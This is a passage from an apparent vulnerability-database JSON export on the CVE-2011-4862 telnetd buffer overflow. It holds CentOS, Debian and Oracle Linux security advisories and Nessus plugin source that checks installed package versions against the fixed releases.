advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-December/030399.html\n\n**Affected packages:**\nkrb5-appl\nkrb5-appl-clients\nkrb5-appl-servers\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1852.html", "edition": 3, "modified": "2011-12-27T21:11:42", "published": "2011-12-27T21:11:42", "href": "http://lists.centos.org/pipermail/centos-announce/2011-December/030399.html", "id": "CESA-2011:1852", "title": "krb5 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:16", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1851\n\n\nKerberos is a network authentication system which allows clients and servers\nto authenticate to each other using symmetric encryption and a trusted third-\nparty, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was 
found in the MIT krb5 telnet daemon (telnetd). A\nremote attacker who can access the telnet port of a target machine could use\nthis flaw to execute arbitrary code as root. (CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any version of \nRed Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have enabled the\ntelnet daemon, and have it accessible remotely, this update should be\napplied immediately. \n\nAll krb5-workstation users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-December/030397.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-December/030398.html\n\n**Affected packages:**\nkrb5\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-server-ldap\nkrb5-workstation\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1851.html", "edition": 3, "modified": "2011-12-27T20:56:16", "published": "2011-12-27T20:44:52", "href": "http://lists.centos.org/pipermail/centos-announce/2011-December/030397.html", "id": "CESA-2011:1851", "title": "krb5 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:28:02", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2372-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nDecember 25, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : heimdal\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: 
no\nCVE ID : CVE-2011-4862\n\nIt was discovered that the Kerberos support for telnetd contains a\npre-authentication buffer overflow, which may enable remote attackers\nwho can connect to the Telnet to execute arbitrary code with root\nprivileges.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.dfsg.1-2.1+lenny1.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.0~git20100726.dfsg.1-2+squeeze1.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your heimdal packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-12-25T17:14:56", "published": "2011-12-25T17:14:56", "id": "DEBIAN:DSA-2372-1:C4E25", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00251.html", "title": "[SECURITY] [DSA 2372-1] heimdal security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:18:34", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2375-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nDecember 26, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : krb5, krb5-appl\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4862\n\nIt was discovered that the encryption support for BSD telnetd contains\na pre-authentication buffer overflow, which may enable remote\nattackers who can connect to the Telnet port to execute 
arbitrary code\nwith root privileges.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.6.dfsg.4~beta1-5lenny7 of the krb5 package.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:1.0.1-1.2 of the krb5-appl package.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your krb5 and krb5-appl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2011-12-26T13:18:47", "published": "2011-12-26T13:18:47", "id": "DEBIAN:DSA-2375-1:FD512", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00254.html", "title": "[SECURITY] [DSA 2375-1] krb5. krb5-appl security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:27:56", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2373-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nDecember 25, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : inetutils\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4862\n\nIt was discovered that the Kerberos support for telnetd contains a\npre-authentication buffer overflow, which may enable remote attackers\nwho can connect to the Telnet to execute arbitrary code with root\nprivileges.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2:1.5.dfsg.1-9+lenny1.\n\nFor the stable distribution (squeeze), 
this problem has been fixed in\nversion 2:1.6-3.1+squeeze1.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your inetutils packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-12-25T17:16:11", "published": "2011-12-25T17:16:11", "id": "DEBIAN:DSA-2373-1:B7CB7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00252.html", "title": "[SECURITY] [DSA 2373-1] inetutils security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:05", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "[1.0.1-7]\n- Correct patch, bump release\n[1.0.1-6]\n- Fix for CVE-2011-4862", "edition": 4, "modified": "2011-12-27T00:00:00", "published": "2011-12-27T00:00:00", "id": "ELSA-2011-1852", "href": "http://linux.oracle.com/errata/ELSA-2011-1852.html", "title": "krb5-appl security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "[1.6.1-63.el5_7]\n- Fix for CVE-2011-4862", "edition": 4, "modified": "2011-12-27T00:00:00", "published": "2011-12-27T00:00:00", "id": "ELSA-2011-1851", "href": "http://linux.oracle.com/errata/ELSA-2011-1851.html", "title": "krb5 security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1526", "CVE-2011-4862"], "description": "[1.6.1-70.el5]\n- add upstream patch for telnetd buffer overflow (CVE-2011-4862, 
#770351)\n[1.6.1-69.el5]\n- ftp: fix a static analysis should-never-happen NULL dereference (#750823)\n[1.6.1-68.el5]\n- backport fixes to teach libkrb5 to use descriptors higher than FD_SETSIZE\n to talk to a KDC by using poll() if it's detected at compile-time, revised\n (#701444, RT#6905)\n[1.6.1-67.el5]\n- add backported patch by way of jbarbuc to free subkeys created by the\n KDC while processing TGS requests (#708516)\n[1.6.1-66.el5]\n- add backported patch by way of several people to better avoid false\n detection of replay attacks when talking to systems with coarse time\n resolution (#713500)\n[1.6.1-65.el5]\n- ftpd: add backported patch to check for errors when calling setegid\n (MITKRB5-SA-2011-005, CVE-2011-1526, #719098)\n[1.6.1-64.el5]\n- klist: don't trip over referral entries when invoked with -s (#729067,\n RT#6915)", "edition": 4, "modified": "2012-03-01T00:00:00", "published": "2012-03-01T00:00:00", "id": "ELSA-2012-0306", "href": "http://linux.oracle.com/errata/ELSA-2012-0306.html", "title": "krb5 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T01:32:24", "description": "According to its self-reported version, the version of AsyncOS running\non the remote Cisco Web Security Appliance (WSA) is affected by a\nremote code execution vulnerability due to a buffer overflow condition\nin the telnet component.", "edition": 26, "published": "2014-11-17T00:00:00", "title": "Cisco Web Security Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/h:cisco:web_security_appliance", "cpe:/o:cisco:asyncos"], "id": "CISCO-SA-20120126-WSA.NASL", "href": "https://www.tenable.com/plugins/nessus/79273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n 
script_id(79273);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"EDB-ID\", value:\"18280\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuo90523\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20120126-ironport\");\n\n script_name(english:\"Cisco Web Security Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)\");\n script_summary(english:\"Checks the WSA version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security appliance is missing a vendor-supplied patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of AsyncOS running\non the remote Cisco Web Security Appliance (WSA) is affected by a\nremote code execution vulnerability due to a buffer overflow condition\nin the telnet component.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6a6592a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCuo90523\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant update referenced in Cisco Security Advisory\ncisco-sa-20120126-ironport.\n\nAlternatively, as a workaround, the vendor notes that Telnet services\ncan be disabled on the device.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-4862\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:web_security_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:asyncos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_wsa_version.nasl\");\n script_require_keys(\"Host/AsyncOS/Cisco Web Security Appliance/DisplayVersion\", \"Host/AsyncOS/Cisco Web Security Appliance/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndisplay_ver = get_kb_item_or_exit('Host/AsyncOS/Cisco Web Security Appliance/DisplayVersion');\nver = get_kb_item_or_exit('Host/AsyncOS/Cisco Web Security Appliance/Version');\n\n# If not paranoid, check if telnet is detected first.\n# get_service() may fork; don't use.\nif (report_paranoia < 2) get_kb_list_or_exit(\"Services/telnet\");\n\n# Affected/Fixed Cisco AsyncOS Software for Cisco WSA :\n# 7.1 and prior - Not Available - Upgrade to 7.7 or later\n# 7.5 - Not Available - Upgrade to 7.7 or later\n# 7.7 - 7.7.0-757\n# 8.0 - 8.0.6-073\n# 8.1 - 8.1.0-235\nif (\n ver =~ \"^[0-6]\\.\" ||\n ver =~ \"^7\\.[01]\\.\" ||\n ver =~ \"^7\\.5\\.\" ||\n ver =~ \"^7\\.7\\.\"\n)\n display_fix = '7.7.0-757';\nelse if (ver =~ \"^8\\.0\\.\")\n display_fix = '8.0.6-073';\nelse if (ver =~ \"^8\\.1\\.\")\n display_fix = '8.1.0-235';\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'Cisco WSA', display_ver);\n\nfix = str_replace(string:display_fix, find:'-', replace:'.');\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, 'Cisco WSA', display_ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + \n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:15", "description": "The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh,\nand rlogin clients and servers. 
Kerberos is a network authentication\nsystem which allows clients and servers to authenticate to each other\nusing symmetric encryption and a trusted third party, the Key\nDistribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon\n(telnetd). A remote attacker who can access the telnet port of a\ntarget machine could use this flaw to execute arbitrary code as root.\n(CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Scientific Linux. In addition, the default firewall rules\nblock remote access to the telnet port. This flaw does not affect the\ntelnet daemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have\nenabled the krb5 telnet daemon, and have it accessible remotely, this\nupdate should be applied immediately.\n\nAll krb5-appl-server users should upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.", "edition": 25, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : krb5-appl on SL6.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111227_KRB5_APPL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61213", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61213);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4862\");\n\n script_name(english:\"Scientific Linux Security Update : krb5-appl on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", 
\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh,\nand rlogin clients and servers. Kerberos is a network authentication\nsystem which allows clients and servers to authenticate to each other\nusing symmetric encryption and a trusted third party, the Key\nDistribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon\n(telnetd). A remote attacker who can access the telnet port of a\ntarget machine could use this flaw to execute arbitrary code as root.\n(CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Scientific Linux. In addition, the default firewall rules\nblock remote access to the telnet port. This flaw does not affect the\ntelnet daemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have\nenabled the krb5 telnet daemon, and have it accessible remotely, this\nupdate should be applied immediately.\n\nAll krb5-appl-server users should upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1112&L=scientific-linux-errata&T=0&P=4434\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?930e0f5f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected krb5-appl-clients, krb5-appl-debuginfo and / or\nkrb5-appl-servers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", 
value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"krb5-appl-clients-1.0.1-7.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"krb5-appl-debuginfo-1.0.1-7.el6_2\")) flag++;\nif 
(rpm_check(release:\"SL6\", reference:\"krb5-appl-servers-1.0.1-7.el6_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:10:10", "description": "Updated krb5 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 3 Extended Life Cycle Support, 5.3 Long\nLife and 5.6 Extended Update Support\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other using symmetric encryption and a\ntrusted third-party, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon\n(telnetd). A remote attacker who can access the telnet port of a\ntarget machine could use this flaw to execute arbitrary code as root.\n(CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Red Hat Enterprise Linux. In addition, the default firewall\nrules block remote access to the telnet port. 
This flaw does not\naffect the telnet daemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have\nenabled the telnet daemon, and have it accessible remotely, this\nupdate should be applied immediately.\n\nAll krb5-workstation users should upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.", "edition": 25, "published": "2013-01-24T00:00:00", "title": "RHEL 5 : krb5 (RHSA-2011:1853)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2013-01-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:krb5-libs", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:krb5-devel", "p-cpe:/a:redhat:enterprise_linux:krb5-workstation", "p-cpe:/a:redhat:enterprise_linux:krb5-server", "p-cpe:/a:redhat:enterprise_linux:krb5-server-ldap", "cpe:/o:redhat:enterprise_linux:5.6"], "id": "REDHAT-RHSA-2011-1853.NASL", "href": "https://www.tenable.com/plugins/nessus/64017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1853. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64017);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_xref(name:\"RHSA\", value:\"2011:1853\");\n\n script_name(english:\"RHEL 5 : krb5 (RHSA-2011:1853)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 3 Extended Life Cycle Support, 5.3 Long\nLife and 5.6 Extended Update Support\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other using symmetric encryption and a\ntrusted third-party, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon\n(telnetd). A remote attacker who can access the telnet port of a\ntarget machine could use this flaw to execute arbitrary code as root.\n(CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any\nversion of Red Hat Enterprise Linux. In addition, the default firewall\nrules block remote access to the telnet port. 
This flaw does not\naffect the telnet daemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have\nenabled the telnet daemon, and have it accessible remotely, this\nupdate should be applied immediately.\n\nAll krb5-workstation users should upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4862.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2011-1853.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-server\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-server-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"krb5-devel-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"krb5-devel-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"krb5-libs-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", 
reference:\"krb5-libs-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"krb5-server-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"krb5-server-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"krb5-workstation-1.6.1-31.el5_3.5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"krb5-workstation-1.6.1-31.el5_3.5\")) flag++;\n\nif (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"krb5-devel-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"krb5-libs-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"krb5-server-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"krb5-server-1.6.1-55.el5_6.3\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"krb5-server-1.6.1-55.el5_6.3\")) flag++;\nif 